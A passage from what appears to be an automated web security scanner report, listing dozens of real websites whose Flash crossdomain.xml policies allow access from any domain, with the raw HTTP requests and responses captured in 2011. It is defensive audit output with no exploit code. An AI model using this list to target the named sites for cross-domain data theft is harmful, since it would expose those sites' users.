<site-control permitted-cross-domain-policies="all"/>
<allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy
...[SNIP]...
8.34. http://usjobsresource.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://usjobsresource.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: usjobsresource.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:32:56 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Mon, 17 Jan 2011 18:41:04 GMT
ETag: "fccc26-c6-49a0f204dd000"
Accept-Ranges: bytes
Content-Length: 198
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
8.35. http://va.px.invitemedia.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://va.px.invitemedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: va.px.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 02 May 2011 02:23:31 GMT
Content-Type: text/plain
Content-Length: 81

<cross-domain-policy>
   <allow-access-from domain="*"/>
</cross-domain-policy>
8.36. http://view.atdmt.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://view.atdmt.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: view.atdmt.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/xml
Last-Modified: Thu, 18 Sep 2003 22:57:15 GMT
Accept-Ranges: bytes
ETag: "488d2234387ec31:0"
Date: Mon, 02 May 2011 02:20:11 GMT
Connection: close
Content-Length: 207

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...
8.37. http://www.4tubehd.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4tubehd.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.4tubehd.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:22:40 GMT
Server: Apache/2.2.16 (FreeBSD) DAV/2 PHP/5.3.5 with Suhosin-Patch
Last-Modified: Fri, 19 Sep 2008 14:11:03 GMT
ETag: "31198a6-64-4574045896bc0"
Accept-Ranges: bytes
Content-Length: 100
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
8.38. http://www.aces.edu/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.aces.edu
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.aces.edu

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:36:34 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Sun, 01 Apr 2007 15:41:00 GMT
ETag: "1438701-ca-ee70bb00"
Accept-Ranges: bytes
Content-Length: 202
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...
8.39. http://www.architecturaldigest.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.architecturaldigest.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.architecturaldigest.com

Response

HTTP/1.0 200 OK
Server: Resin/3.1.6
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Cache-Control: private, max-age=600
Expires: Mon, 02 May 2011 00:29:00 GMT
Date: Mon, 02 May 2011 00:19:00 GMT
Content-Length: 131
Connection: close
X-N: S


<?xml version="1.0" encoding="UTF-8"?>

<cross-domain-policy>
<allow-access-from domain="*" to-ports="*"/>
</cross-domain-policy>
8.40. http://www.babesandstars.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.babesandstars.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.babesandstars.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:20:02 GMT
Server: Apache
Last-Modified: Fri, 15 Apr 2011 20:49:49 GMT
ETag: "5e403c1-8d-4a0fb2ec8f540"
Accept-Ranges: bytes
Content-Length: 141
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.*" />
<allow-access-from domain="*" />
</cross-domain-policy>
8.41. http://www.bakugandimensions.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bakugandimensions.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.bakugandimensions.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:28:23 GMT
Server: Apache
Last-Modified: Tue, 01 Mar 2011 01:30:36 GMT
ETag: "23102f-111-49d61be3e8700"
Accept-Ranges: bytes
Content-Length: 273
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" secure="false"/>
   <allow-h
...[SNIP]...
8.42. http://www.banner.kiev.ua/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.banner.kiev.ua
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.banner.kiev.ua

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sun, 01 May 2011 23:16:20 GMT
Content-Type: text/xml; charset=utf8
Content-Length: 203
Last-Modified: Fri, 28 Nov 2008 12:59:15 GMT
Connection: close
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...
8.43. http://www.bigrebelgames.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bigrebelgames.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.bigrebelgames.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:25:58 GMT
Server: Apache
Last-Modified: Thu, 08 Apr 2010 15:07:04 GMT
ETag: "10a-4bbdf118"
Accept-Ranges: bytes
Content-Length: 266
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="UTF-8"?>
<!-- http://www.youtube.com/crossdomain.xml -->
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...
8.44. http://www.bonhams.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bonhams.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.bonhams.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:16:31 GMT
Server: Apache
Last-Modified: Wed, 24 Feb 2010 15:57:30 GMT
ETag: "29fd-ca-4805ab93c6e80"
Accept-Ranges: bytes
Content-Length: 202
Vary: Accept-Encoding
Content-Type: text/xml
Expires: Sun, 01 May 2011 23:31:31 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-polic
...[SNIP]...
8.45. http://www.cbs8.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cbs8.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.cbs8.com

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/5.0
WN: IIS29
P3P: CP="CAO ADMa DEVa TAIa CONi OUR OTRi IND PHY ONL UNI COM NAV INT DEM PRE"
Content-Type: text/xml
Last-Modified: Thu, 06 Nov 2008 15:03:45 GMT
ETag: "1f1e5ddd2040c91:ac8"
Cteonnt-Length: 208
Expires: Mon, 02 May 2011 00:40:25 GMT
Cache-Control: max-age=0, no-cache
Pragma: no-cache
Date: Mon, 02 May 2011 00:40:25 GMT
Content-Length: 208
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain
...[SNIP]...
8.46. http://www.express.co.uk/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.express.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.express.co.uk

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:30:44 GMT
Server: Apache
Last-Modified: Mon, 27 Apr 2009 17:01:16 GMT
ETag: "641b0-1ff-4688c4b5def00"
Accept-Ranges: bytes
Content-Length: 511
MS-Author-Via: DAV
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.netro42.com" />
<allow-access-from domain="*.netro42.net" />
<allow-access-from domain="*.dailyexpress.co.uk" />
<allow-access-from domain="*.express.co.uk" />
<allow-access-from domain="*.scottishdailyexpress.co.uk" />
<allow-access-from domain="*express.co.uk" />
<allow-access-from domain="*" />
...[SNIP]...
8.47. http://www.foxytube.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.foxytube.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.foxytube.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:26:42 GMT
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny9 with Suhosin-Patch
Last-Modified: Fri, 04 Dec 2009 19:53:36 GMT
ETag: "2e008f1-92-479ec769bb000"
Accept-Ranges: bytes
Content-Length: 146
Connection: close
Content-Type: application/xml
Set-Cookie: RNLBSERVERID=ded691; path=/
Cache-control: private

<?xml version="1.0"?>
<!-- http://www.foo.com/crossdomain.xml -->
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
8.48. http://www.freemooviesonline.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.freemooviesonline.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.freemooviesonline.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:55:38 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.13
Last-Modified: Thu, 03 Jun 2010 12:56:46 GMT
ETag: "314040-cb-4881fbd2c3f80"
Accept-Ranges: bytes
Content-Length: 203
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...
8.49. http://www.fulltiltpoker.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fulltiltpoker.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.fulltiltpoker.net

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:32:44 GMT
Server: Apache/2.2.9 (Debian) mod_ssl/2.2.9 OpenSSL/0.9.8g
Last-Modified: Thu, 20 Jan 2011 11:11:28 GMT
Accept-Ranges: bytes
Content-Length: 77
Vary: Accept-Encoding
Connection: close
Content-Type: application/xml

<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy>
8.50. http://www.goodtoknow.co.uk/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.goodtoknow.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.goodtoknow.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Thu, 14 Apr 2011 08:28:48 GMT
ETag: "1c90d62-71-4a0dcb6dc9000"
Accept-Ranges: bytes
Content-Length: 113
Content-Type: text/xml
Date: Mon, 02 May 2011 00:18:20 GMT
Connection: close
Set-Cookie: browsertype=web; expires=Tue, 03-May-2011 00:18:20 GMT; path=/; domain=.goodtoknow.co.uk

...<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

8.51. http://www.healthination.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.healthination.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.healthination.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Sun, 01 May 2011 23:56:04 GMT
Content-Type: text/xml
Connection: close
Last-Modified: Tue, 17 Feb 2009 16:22:47 GMT
Content-Length: 221
Cache-Control: max-age=4200
Expires: Mon, 02 May 2011 01:06:04 GMT
Accept-Ranges: bytes

<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<allow-access-from domain="*"/>
<
...[SNIP]...
8.52. http://www.hyperlaunch.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.hyperlaunch.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.hyperlaunch.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:52:10 GMT
Server: Apache/2.0.52 (CentOS)
Last-Modified: Thu, 04 Dec 2008 13:37:45 GMT
ETag: "a70756-d8-aa62dc40"
Accept-Ranges: bytes
Content-Length: 216
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
</cross
...[SNIP]...
8.53. http://www.jacksonnewspapers.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.jacksonnewspapers.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.jacksonnewspapers.com

Response

HTTP/1.0 200 OK
Date: Sun, 01 May 2011 23:16:27 GMT
Server: zope.server.http (WSGI-HTTP)
X-Powered-By: Zope (www.zope.org), Python (www.python.org)
Content-Length: 200
Content-Type: text/html;charset=utf-8
X-Cache: MISS from parent3.ghm.zope.net
X-Cache: MISS from cache5.ghm.zope.net
Via: 1.0 parent3.ghm.zope.net:80 (squid/2.7.STABLE9), 1.0 cache5.ghm.zope.net:80 (squid)
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
8.54. http://www.journalstandard.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.journalstandard.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.journalstandard.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:41:51 GMT
Server: zope.server.http (WSGI-HTTP)
X-Powered-By: Zope (www.zope.org), Python (www.python.org)
Content-Length: 200
Content-Type: text/html;charset=utf-8
Age: 1173
X-Cache: HIT from parent3.ghm.zope.net
X-Cache: MISS from cache7.ghm.zope.net
Via: 1.0 parent3.ghm.zope.net:80 (squid/2.7.STABLE9), 1.0 cache7.ghm.zope.net:80 (squid)
Vary: Accept-Encoding
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
8.55. http://www.ksrevenue.org/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.ksrevenue.org
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.ksrevenue.org

Response

HTTP/1.1 200 OK
Content-Length: 230
Content-Type: text/xml
Last-Modified: Fri, 04 Feb 2011 19:33:26 GMT
Accept-Ranges: bytes
ETag: "9b9ec65a2c4cb1:2206"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:21:51 GMT
Connection: close

<?xml version="1.0" ?>
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"/>
<allow-access-from domain="*"/>
<allow-http-request-headers-from domain="*" headers
...[SNIP]...
8.56. http://www.mountaindew.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mountaindew.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.mountaindew.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:16:58 GMT
Server: TMTS-ws
Last-Modified: Thu, 20 Sep 2007 23:44:48 GMT
ETag: "24224-6b-bd595c00"
Accept-Ranges: bytes
Content-Length: 107
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>

8.57. http://www.muschealth.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.muschealth.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.muschealth.com

Response

HTTP/1.1 200 OK
Content-Length: 205
Content-Type: text/xml
Server: Microsoft-IIS/7.0
Set-Cookie: CFID=49938952;expires=Wed, 24-Apr-2041 00:39:41 GMT;path=/
Set-Cookie: CFTOKEN=24f830386923fdf2-AE257784-23AE-EC0F-204DD6AAFB81BEA9;expires=Wed, 24-Apr-2041 00:39:41 GMT;path=/
Set-Cookie: SESESSIONID=13AC370D1712A5A6B92C40F59746CAAD;path=/
Set-Cookie: SESESSIONCODE=F9A6A00645F11EA5F1298311F2DB3976;path=/
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:39:41 GMT
Connection: keep-alive
Set-Cookie: NSC_tjuffyfd-fyu=ffffffff831fd44345525d5f4f58455e445a4a423660;expires=Mon, 02-May-2011 15:39:41 GMT;path=/

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...
8.58. http://www.outdoorjp.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.outdoorjp.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.outdoorjp.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:56:01 GMT
Server: Apache
Last-Modified: Thu, 14 Oct 2010 12:39:01 GMT
ETag: "26c4b4c-8d-4cb6f9e5"
Accept-Ranges: bytes
Content-Length: 141
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.*" />
<allow-access-from domain="*" />
</cross-domain-policy>
8.59. http://www.partyamerica.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.partyamerica.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.partyamerica.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Thu, 28 Apr 2011 20:06:39 GMT
ETag: "cb-185891c0"
Accept-Ranges: bytes
Content-Length: 203
Content-Type: application/xml
Cache-Control: max-age=81032
Expires: Mon, 02 May 2011 22:12:44 GMT
Date: Sun, 01 May 2011 23:42:12 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...
8.60. http://www.pisamba.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pisamba.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.pisamba.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:16:27 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 02 Sep 2008 02:35:49 GMT
ETag: "65c0222-78-455e093e2eb40"
Accept-Ranges: bytes
Content-Length: 120
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/xml

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>
8.61. http://www.thebeatles.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thebeatles.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.thebeatles.com

Response

HTTP/1.0 200 OK
Date: Mon, 02 May 2011 00:52:53 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 09 Sep 2009 11:59:16 GMT
ETag: "64804a-116-cfe84d00"
Accept-Ranges: bytes
Content-Length: 278
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/xml

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-po
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...
8.62. http://www.thefordstory.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thefordstory.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.thefordstory.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 12 Feb 2009 20:24:12 GMT
ETag: "469b4-e1-80db3300"
Accept-Ranges: bytes
Content-Length: 225
Content-Type: text/xml
Date: Sun, 01 May 2011 23:53:29 GMT
Connection: close

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" />
...[SNIP]...
8.63. http://www.thehothits.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.thehothits.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

